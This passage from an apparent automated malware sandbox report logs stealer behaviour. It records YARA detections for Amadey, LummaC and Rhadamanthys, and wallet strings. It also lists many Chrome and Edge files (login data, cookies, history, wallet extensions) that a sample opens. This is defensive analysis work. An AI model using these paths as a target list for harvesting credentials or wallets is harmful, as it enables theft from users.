                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00FCCBEA
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_006165E0 LookupAccountNameA,6_2_006165E0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00652517 GetTimeZoneInformation,6_2_00652517
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Amadeys stealer DLL
                          Source: Yara matchFile source: 6.2.skotes.exe.610000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.fb0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.skotes.exe.610000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.skotes.exe.610000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000006.00000003.2820833506.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2131654122.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.2160965888.0000000004710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000003.2177174832.0000000005290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: Process Memory Space: 5639a58f3b.exe PID: 340, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 850609077b.exe PID: 4196, type: MEMORYSTR
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected RHADAMANTHYS Stealer
                          Source: Yara matchFile source: 0000002A.00000003.3314605880.0000000005700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000002.3336661213.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000003.3318038166.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.3318224508.0000000005930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000CF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Ele
                          Source: 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                          Source: 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyn=
                          Source: 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                          Source: 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000CF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                          Source: 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000CF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sion@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":TB'
                          Source: 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000CF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                          Source: 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000CFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                          Source: 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
